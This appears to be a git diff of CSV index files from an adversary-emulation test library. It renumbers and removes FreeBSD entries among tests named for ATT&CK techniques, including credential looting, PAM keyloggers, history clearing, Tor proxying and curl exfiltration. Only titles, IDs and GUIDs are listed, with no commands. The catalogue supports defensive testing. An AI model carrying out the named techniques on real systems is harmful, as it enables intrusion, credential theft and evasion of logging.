+execution,T1059.004,Command and Scripting Interpreter: Bash,13,Current kernel information enumeration,3a53734a-9e26-4f4b-ad15-059e767f5f14,sh
 execution,T1559,Inter-Process Communication,1,Cobalt Strike Artifact Kit pipe,bd13b9fc-b758-496a-b81a-397462f82c72,command_prompt
 execution,T1559,Inter-Process Communication,2,Cobalt Strike Lateral Movement (psexec_psh) pipe,830c8b6c-7a70-4f40-b975-8bbe74558acd,command_prompt
 execution,T1559,Inter-Process Communication,3,Cobalt Strike SSH (postex_ssh) pipe,d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6,command_prompt
@@ -1158,11 +1144,10 @@ persistence,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user t
 persistence,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
 persistence,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 persistence,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
-persistence,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh
-persistence,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
-persistence,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
-persistence,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
-persistence,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
+persistence,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
+persistence,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
+persistence,T1078.003,Valid Accounts: Local Accounts,11,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
+persistence,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
 persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
 persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
 persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -1190,9 +1175,8 @@ command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,
 command-and-control,T1572,Protocol Tunneling,4,run ngrok,4cdc9fc7-53fb-4894-9f0c-64836943ea60,powershell
 command-and-control,T1090.003,Proxy: Multi-hop Proxy,1,Psiphon,14d55ca0-920e-4b44-8425-37eedd72b173,powershell
 command-and-control,T1090.003,Proxy: Multi-hop Proxy,2,Tor Proxy Usage - Windows,7b9d85e5-c4ce-4434-8060-d3de83595e69,powershell
-command-and-control,T1090.003,Proxy: Multi-hop Proxy,3,Tor Proxy Usage - Debian/Ubuntu,5ff9d047-6e9c-4357-b39b-5cf89d9b59c7,sh
+command-and-control,T1090.003,Proxy: Multi-hop Proxy,3,Tor Proxy Usage - Debian/Ubuntu/FreeBSD,5ff9d047-6e9c-4357-b39b-5cf89d9b59c7,sh
 command-and-control,T1090.003,Proxy: Multi-hop Proxy,4,Tor Proxy Usage - MacOS,12631354-fdbc-4164-92be-402527e748da,sh
-command-and-control,T1090.003,Proxy: Multi-hop Proxy,5,Tor Proxy Usage - FreeBSD,550ec67d-a99e-408b-816a-689271b27d2a,sh
 command-and-control,T1571,Non-Standard Port,1,Testing usage of uncommonly used port with PowerShell,21fe622f-8e53-4b31-ba83-6d333c2583f4,powershell
 command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
 command-and-control,T1573,Encrypted Channel,1,OpenSSL C2,21caf58e-87ad-440c-a6b8-3ac259964003,powershell
@@ -1263,9 +1247,8 @@ collection,T1123,Audio Capture,1,using device audio capture commandlet,9c3ad250-
 collection,T1123,Audio Capture,2,Registry artefact when application use microphone,7a21cce2-6ada-4f7c-afd9-e1e9c481e44a,command_prompt
 collection,T1123,Audio Capture,3,using Quicktime Player,c7a0bb71-70ce-4a53-b115-881f241b795b,sh
 collection,T1074.001,Data Staged: Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell
-collection,T1074.001,Data Staged: Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
-collection,T1074.001,Data Staged: Local Data Staging,3,Stage data from Discovery.sh (freebsd),4fca7b49-379d-4493-8890-d6297750fa46,sh
-collection,T1074.001,Data Staged: Local Data Staging,4,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell
+collection,T1074.001,Data Staged: Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,sh
+collection,T1074.001,Data Staged: Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell
 collection,T1114.001,Email Collection: Local Email Collection,1,Email Collection with PowerShell Get-Inbox,3f1b5096-0139-4736-9b78-19bcb02bb1cb,powershell
 collection,T1119,Automated Collection,1,Automated Collection Command Prompt,cb379146-53f1-43e0-b884-7ce2c635ff5b,command_prompt
 collection,T1119,Automated Collection,2,Automated Collection PowerShell,634bd9b9-dc83-4229-b19f-7f83ba9ad313,powershell
@@ -1546,12 +1529,11 @@ discovery,T1087.001,Account Discovery: Local Account,2,View sudoers access,fed9b
 discovery,T1087.001,Account Discovery: Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
 discovery,T1087.001,Account Discovery: Local Account,4,List opened files by user,7e46c7a5-0142-45be-a858-1a3ecb4fd3cb,sh
 discovery,T1087.001,Account Discovery: Local Account,5,Show if a user account has ever logged in remotely,0f0b6a29-08c3-44ad-a30b-47fd996b2110,sh
-discovery,T1087.001,Account Discovery: Local Account,6,Show if a user account has ever logged in remotely (freebsd),0f73418f-d680-4383-8a24-87bc97fe4e35,sh
-discovery,T1087.001,Account Discovery: Local Account,7,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
-discovery,T1087.001,Account Discovery: Local Account,8,Enumerate users and groups,319e9f6c-7a9e-432e-8c62-9385c803b6f2,sh
-discovery,T1087.001,Account Discovery: Local Account,9,Enumerate all accounts on Windows (Local),80887bec-5a9b-4efc-a81d-f83eb2eb32ab,command_prompt
-discovery,T1087.001,Account Discovery: Local Account,10,Enumerate all accounts via PowerShell (Local),ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b,powershell
-discovery,T1087.001,Account Discovery: Local Account,11,Enumerate logged on users via CMD (Local),a138085e-bfe5-46ba-a242-74a6fb884af3,command_prompt
+discovery,T1087.001,Account Discovery: Local Account,6,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
+discovery,T1087.001,Account Discovery: Local Account,7,Enumerate users and groups,319e9f6c-7a9e-432e-8c62-9385c803b6f2,sh
+discovery,T1087.001,Account Discovery: Local Account,8,Enumerate all accounts on Windows (Local),80887bec-5a9b-4efc-a81d-f83eb2eb32ab,command_prompt
+discovery,T1087.001,Account Discovery: Local Account,9,Enumerate all accounts via PowerShell (Local),ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b,powershell
+discovery,T1087.001,Account Discovery: Local Account,10,Enumerate logged on users via CMD (Local),a138085e-bfe5-46ba-a242-74a6fb884af3,command_prompt
 discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
 discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (FreeBSD),e129d73b-3e03-4ae9-bf1e-67fc8921e0fd,sh
 discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,3,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
@@ -1828,11 +1810,10 @@ initial-access,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing use
 initial-access,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
 initial-access,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 initial-access,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
-initial-access,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh
-initial-access,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
-initial-access,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
-initial-access,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
-initial-access,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
+initial-access,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
+initial-access,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
+initial-access,T1078.003,Valid Accounts: Local Accounts,11,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
+initial-access,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
 exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0,powershell
 exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,1,Exfiltrate data HTTPS using curl windows,1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0,command_prompt
 exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,2,"Exfiltrate data HTTPS using curl freebsd,linux or macos",4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01,bash
diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv
index 9badbe408..4b671347c 100644
--- a/atomics/Indexes/Indexes-CSV/linux-index.csv
+++ b/atomics/Indexes/Indexes-CSV/linux-index.csv
@@ -39,21 +39,14 @@ defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Ma
 defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",19,Overwrite Linux Mail Spool,1602ff76-ed7f-4c94-b550-2f727b4782d4,bash
 defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",20,Overwrite Linux Log,d304b2dc-90b4-4465-a650-16ddd503f7b5,bash
 defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,2,Clear sh history (rm),448893f8-1d5d-4ae2-9017-7fcd73a7e100,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,3,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,4,Clear sh history (echo),a4d63cb3-9ed9-4837-9480-5bf6b09a6c96,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,5,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,6,Clear sh history (cat dev/null),ecaefd53-6fa4-4781-ba51-d9d6fb94dbdc,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,7,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,8,Clear sh history (ln dev/null),3126aa7a-8768-456f-ae05-6ab2d4accfdd,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,9,Clear Bash history (truncate),47966a1d-df4f-4078-af65-db6d9aa20739,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,10,Clear sh history (truncate),e14d9bb0-c853-4503-aa89-739d5c0a5818,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,11,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,12,Clear history of a bunch of shells (freebsd),9bf7c8af-5e12-42ea-bf6b-b0348fb9dfb0,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,13,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,14,Use Space Before Command to Avoid Logging to History,53b03a54-4529-4992-852d-a00b4b7215a6,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,15,Disable Bash History Logging with SSH -T,5f8abd62-f615-43c5-b6be-f780f25790a1,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,16,Disable sh History Logging with SSH -T (freebsd),ec3f2306-dd19-4c4b-bed7-92d20e9b1dee,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,4,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,5,Clear Bash history (truncate),47966a1d-df4f-4078-af65-db6d9aa20739,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,6,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,7,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,8,Use Space Before Command to Avoid Logging to History,53b03a54-4529-4992-852d-a00b4b7215a6,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,9,Disable Bash History Logging with SSH -T,5f8abd62-f615-43c5-b6be-f780f25790a1,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,3,Base64 decoding with Python,356dc0e8-684f-4428-bb94-9313998ad608,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,4,Base64 decoding with Perl,6604d964-b9f6-4d4b-8ce8-499829a14d0a,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding with shell utilities,b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e,sh
@@ -134,18 +127,16 @@ defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Deliver
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,1,Delete a single file - FreeBSD/Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,2,Delete an entire folder - FreeBSD/Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh
-defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f10-4485-ad26-abf22a764c52,bash
-defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,9,Delete Filesystem - FreeBSD,b5aaca7e-a48f-4f1b-8f0f-a27b8f516608,sh
+defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f10-4485-ad26-abf22a764c52,sh
 defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,1,Binary simply packed by UPX (linux),11c46cd8-e471-450e-acb8-52a1216ae6a4,sh
 defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,2,"Binary packed by UPX, with modified headers (linux)",f06197f8-ff46-48c2-a0c6-afc1b50665e1,sh
 defense-evasion,T1036.006,Masquerading: Space after Filename,2,Space After Filename,b95ce2eb-a093-4cd8-938d-5258cef656ea,sh
 defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,1,Create a hidden file in a hidden directory,61a782e5-9a19-40b5-8ba4-69a4b9f3d7be,sh
 defense-evasion,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,11,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
 persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
 persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM rule (freebsd),b17eacac-282d-4ca8-a240-46602cf863e3,sh
 persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,3,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
@@ -187,15 +178,13 @@ persistence,T1543.002,Create or Modify System Process: SysV/Systemd Service,2,Cr
 persistence,T1543.002,Create or Modify System Process: SysV/Systemd Service,3,"Create Systemd Service file,  Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
 persistence,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
 persistence,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
-persistence,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh
-persistence,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
-persistence,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
-persistence,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
-persistence,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
+persistence,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
+persistence,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
+persistence,T1078.003,Valid Accounts: Local Accounts,11,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
+persistence,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
 command-and-control,T1132.001,Data Encoding: Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
 command-and-control,T1132.001,Data Encoding: Standard Encoding,2,Base64 Encoded data (freebsd),2d97c626-7652-449e-a986-b02d9051c298,sh
-command-and-control,T1090.003,Proxy: Multi-hop Proxy,3,Tor Proxy Usage - Debian/Ubuntu,5ff9d047-6e9c-4357-b39b-5cf89d9b59c7,sh
-command-and-control,T1090.003,Proxy: Multi-hop Proxy,5,Tor Proxy Usage - FreeBSD,550ec67d-a99e-408b-816a-689271b27d2a,sh
+command-and-control,T1090.003,Proxy: Multi-hop Proxy,3,Tor Proxy Usage - Debian/Ubuntu/FreeBSD,5ff9d047-6e9c-4357-b39b-5cf89d9b59c7,sh
 command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
 command-and-control,T1071.001,Application Layer Protocol: Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh
 command-and-control,T1105,Ingress Tool Transfer,1,rsync remote file copy (push),0fc6e977-cb12-44f6-b263-2824ba917409,sh
@@ -222,8 +211,7 @@ collection,T1056.001,Input Capture: Keylogging,4,Logging sh history to syslog/me
 collection,T1056.001,Input Capture: Keylogging,5,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,bash
 collection,T1056.001,Input Capture: Keylogging,6,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
 collection,T1056.001,Input Capture: Keylogging,7,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
-collection,T1074.001,Data Staged: Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
-collection,T1074.001,Data Staged: Local Data Staging,3,Stage data from Discovery.sh (freebsd),4fca7b49-379d-4493-8890-d6297750fa46,sh
+collection,T1074.001,Data Staged: Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,sh
 collection,T1115,Clipboard Data,5,Add or copy content to clipboard with xClip,ee363e53-b083-4230-aff3-f8d955f2d5bb,sh
 collection,T1005,Data from Local System,2,Find and dump sqlite databases (Linux),00cbb875-7ae4-4cf1-b638-e543fd825300,bash
 collection,T1560.002,Archive Collected Data: Archive via Library,1,Compressing data using GZip in Python (FreeBSD/Linux),391f5298-b12d-4636-8482-35d9c17d53a8,sh
@@ -275,11 +263,10 @@ privilege-escalation,T1543.002,Create or Modify System Process: SysV/Systemd Ser
 privilege-escalation,T1543.002,Create or Modify System Process: SysV/Systemd Service,3,"Create Systemd Service file,  Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
 privilege-escalation,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
 privilege-escalation,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,11,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
 credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
 credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM rule (freebsd),b17eacac-282d-4ca8-a240-46602cf863e3,sh
 credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,3,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
@@ -332,8 +319,7 @@ discovery,T1087.001,Account Discovery: Local Account,2,View sudoers access,fed9b
 discovery,T1087.001,Account Discovery: Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
 discovery,T1087.001,Account Discovery: Local Account,4,List opened files by user,7e46c7a5-0142-45be-a858-1a3ecb4fd3cb,sh
 discovery,T1087.001,Account Discovery: Local Account,5,Show if a user account has ever logged in remotely,0f0b6a29-08c3-44ad-a30b-47fd996b2110,sh
-discovery,T1087.001,Account Discovery: Local Account,6,Show if a user account has ever logged in remotely (freebsd),0f73418f-d680-4383-8a24-87bc97fe4e35,sh
-discovery,T1087.001,Account Discovery: Local Account,7,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
+discovery,T1087.001,Account Discovery: Local Account,6,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
 discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
 discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (FreeBSD),e129d73b-3e03-4ae9-bf1e-67fc8921e0fd,sh
 discovery,T1069.002,Permission Groups Discovery: Domain Groups,15,Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS,d58d749c-4450-4975-a9e9-8b1d562755c2,sh
@@ -399,14 +385,10 @@ execution,T1059.004,Command and Scripting Interpreter: Bash,6,What shell is runn
 execution,T1059.004,Command and Scripting Interpreter: Bash,7,What shells are available,bf23c7dc-1004-4949-8262-4c1d1ef87702,sh
 execution,T1059.004,Command and Scripting Interpreter: Bash,8,Command line scripts,b04ed73c-7d43-4dc8-b563-a2fc595cba1a,sh
 execution,T1059.004,Command and Scripting Interpreter: Bash,9,Obfuscated command line scripts,5bec4cc8-f41e-437b-b417-33ff60acf9af,sh
-execution,T1059.004,Command and Scripting Interpreter: Bash,10,Obfuscated command line scripts (freebsd),5dc1d9dd-f396-4420-b985-32b1c4f79062,sh
-execution,T1059.004,Command and Scripting Interpreter: Bash,11,Change login shell,c7ac59cb-13cc-4622-81dc-6d2fee9bfac7,bash
-execution,T1059.004,Command and Scripting Interpreter: Bash,12,Change login shell (freebsd),33b68b9b-4988-4caf-9600-31b7bf04227c,sh
-execution,T1059.004,Command and Scripting Interpreter: Bash,13,Environment variable scripts,bdaebd56-368b-4970-a523-f905ff4a8a51,bash
-execution,T1059.004,Command and Scripting Interpreter: Bash,14,Environment variable scripts (freebsd),663b205d-2121-48a3-a6f9-8c9d4d87dfee,sh
-execution,T1059.004,Command and Scripting Interpreter: Bash,15,Detecting pipe-to-shell,fca246a8-a585-4f28-a2df-6495973976a1,bash
-execution,T1059.004,Command and Scripting Interpreter: Bash,16,Detecting pipe-to-shell (freebsd),1a06b1ec-0cca-49db-a222-3ebb6ef25632,sh
-execution,T1059.004,Command and Scripting Interpreter: Bash,17,Current kernel information enumeration,3a53734a-9e26-4f4b-ad15-059e767f5f14,sh
+execution,T1059.004,Command and Scripting Interpreter: Bash,10,Change login shell,c7ac59cb-13cc-4622-81dc-6d2fee9bfac7,bash
+execution,T1059.004,Command and Scripting Interpreter: Bash,11,Environment variable scripts,bdaebd56-368b-4970-a523-f905ff4a8a51,sh
